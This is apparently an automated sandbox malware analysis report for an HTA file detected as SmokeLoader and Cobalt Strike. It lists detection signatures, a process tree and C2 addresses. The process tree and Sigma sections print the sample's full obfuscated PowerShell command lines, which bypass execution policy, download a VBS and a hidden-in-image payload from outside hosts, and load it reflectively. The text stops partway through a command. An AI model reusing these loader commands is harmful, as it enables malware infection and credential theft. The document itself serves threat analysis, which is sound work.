Edit tour

Windows Analysis Report
veryeasythingsevermadeforcreatenewthignsbetterthigns.hta

Overview

General Information

Sample name:	veryeasythingsevermadeforcreatenewthignsbetterthigns.hta
Analysis ID:	1539853
MD5:	9f1733aa2737250f3e253416eece168d
SHA1:	55f89ea7ec19fd9bad79d119e5e0d2bb5eb86a17
SHA256:	63996411977b3f59cee9b839e79955227b66ef2cf7ddd9ee388ad4fdc5559045
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected SmokeLoader

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if browser processes are running

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to compare user and computer (likely to detect sandboxes)

Creates a thread in another existing process (thread injection)

Found evasive API chain (may stop execution after checking mutex)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7744 cmdline: mshta.exe "C:\Users\user\Desktop\veryeasythingsevermadeforcreatenewthignsbetterthigns.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7848 cmdline: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 8152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 8168 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 1384 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 6128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

aspnet_regbrowsers.exe (PID: 1704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF)

aspnet_regbrowsers.exe (PID: 8012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 2312 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 2796 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 4232 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

WerFault.exe (PID: 7352 cmdline: C:\Windows\system32\WerFault.exe -u -p 4232 -s 704 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

explorer.exe (PID: 3108 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 4072 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 6160 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 4576 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

wihaduv (PID: 1556 cmdline: C:\Users\user\AppData\Roaming\wihaduv MD5: BB8B6B54FD50C08AB579B84BF07918CF)

conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: powershell.exe PID: 6128	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x8e813:$b2: ::FromBase64String( 0xa5f23:$b2: ::FromBase64String( 0xa64f3:$b2: ::FromBase64String( 0xa7057:$b2: ::FromBase64String( 0xa820f:$b2: ::FromBase64String( 0xa88d2:$b2: ::FromBase64String( 0xa9165:$b2: ::FromBase64String( 0xa97ba:$b2: ::FromBase64String( 0xaa9f3:$b2: ::FromBase64String( 0x1010:$b3: ::UTF8.GetString( 0x2179f:$b3: ::UTF8.GetString( 0x22055:$b3: ::UTF8.GetString( 0x311cc:$b3: ::UTF8.GetString( 0x31b1e:$b3: ::UTF8.GetString( 0x323dc:$b3: ::UTF8.GetString( 0x3c49d:$b3: ::UTF8.GetString( 0x3cd53:$b3: ::UTF8.GetString( 0x4478d:$b3: ::UTF8.GetString( 0x4504b:$b3: ::UTF8.GetString( 0x45f2e:$b3: ::UTF8.GetString( 0x46999:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 6124	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6124	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1035:$b2: ::FromBase64String( 0x1678:$b2: ::FromBase64String( 0x4987:$b2: ::FromBase64String( 0x4fca:$b2: ::FromBase64String( 0x6d31:$b2: ::FromBase64String( 0x7df2:$b2: ::FromBase64String( 0x950e:$b2: ::FromBase64String( 0x99c2:$b2: ::FromBase64String( 0x9e38:$b2: ::FromBase64String( 0xf5a4e:$b2: ::FromBase64String( 0xf6091:$b2: ::FromBase64String( 0xf71d1:$b2: ::FromBase64String( 0x163dc8:$b2: ::FromBase64String( 0x16600f:$b2: ::FromBase64String( 0x1665e0:$b2: ::FromBase64String( 0x16d553:$b2: ::FromBase64String( 0x16f8ce:$b2: ::FromBase64String( 0x34a20c:$b2: ::FromBase64String( 0x9055e5:$b2: ::FromBase64String( 0x9063f2:$b2: ::FromBase64String( 0x906a41:$b2: ::FromBase64String(
Process Memory Space: explorer.exe PID: 3108	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 4072	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.aspnet_regbrowsers.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_7848.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
amsi32_6124.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhz

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = 